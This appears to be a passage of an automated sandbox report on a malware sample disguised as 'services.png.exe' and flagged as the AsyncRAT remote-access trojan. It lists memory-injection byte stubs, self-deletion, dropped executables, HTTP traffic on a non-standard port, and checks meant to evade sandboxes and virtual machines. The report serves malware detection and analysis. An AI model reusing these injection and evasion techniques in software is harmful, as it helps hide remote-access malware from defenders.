Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 22800FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 228016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2280187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2520000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 2520011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A400FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A4016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2A40187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2E20000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 2E20011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\services.png.exe

File created: C:\Users\user\AppData\Local\Temp\tmp79c95342.bat

Jump to dropped file

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: png.exe

Static PE information: services.png.exe

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 5555 -> 49952

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0040F336 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_0040F336

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Xigi Ovda

Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\services.png.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_0-49793
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_1-26918
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_1-26918

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-26968

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Renames NTDLL to bypass HIPS

Source: C:\Users\user\Desktop\services.png.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File opened: C:\Windows\SysWOW64\ntdll.dll	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE39691VIDEOPIX.MOVIEMAKERFREEVIDEOEDITOR_DXZ7H1QND1PGE!APP
Source: SearchApp.exe, 0000000A.00000003.1899723944.0000024340D8D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 868	Jump to behavior
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Window / User API: threadDelayed 823
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Window / User API: threadDelayed 825
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Window / User API: threadDelayed 824
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Window / User API: threadDelayed 825
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Window / User API: threadDelayed 825

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\services.png.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3858.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\services.png.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3809.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp4623.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp45F4.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\services.png.exe	Evaded block: after key decision			graph_0-49453
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Evaded block: after key decision			graph_1-27218

Source: C:\Windows\System32\ctfmon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\RuntimeBroker.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-26855

Source: C:\Users\user\Desktop\services.png.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-50115
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-26972

Source: C:\Windows\System32\svchost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.4 %
Source: C:\Windows\System32\ctfmon.exe	API coverage: 5.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.9 %
Source: C:\Windows\System32\RuntimeBroker.exe	API coverage: 8.0 %
Source: C:\Windows\System32\RuntimeBroker.exe	API coverage: 3.8 %
Source: C:\Windows\System32\RuntimeBroker.exe	API coverage: 3.7 %
Source: C:\Windows\System32\RuntimeBroker.exe	API coverage: 4.9 %

Source: C:\Users\user\Desktop\services.png.exe TID: 6464	Thread sleep count: 83 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 928	Thread sleep count: 82 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe TID: 7956	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2188	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 3064	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6544	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2212	Thread sleep count: 132 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4048	Thread sleep count: 103 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2364	Thread sleep count: 125 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 2364	Thread sleep count: 133 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6248	Thread sleep count: 133 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6444	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6444	Thread sleep count: 825 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 6488	Thread sleep count: 824 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 1104	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 1104	Thread sleep count: 825 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4124	Thread sleep count: 104 > 30
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe TID: 4124	Thread sleep count: 825 > 30

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Last function: Thread delayed
Source: C:\Windows\System32\sihost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
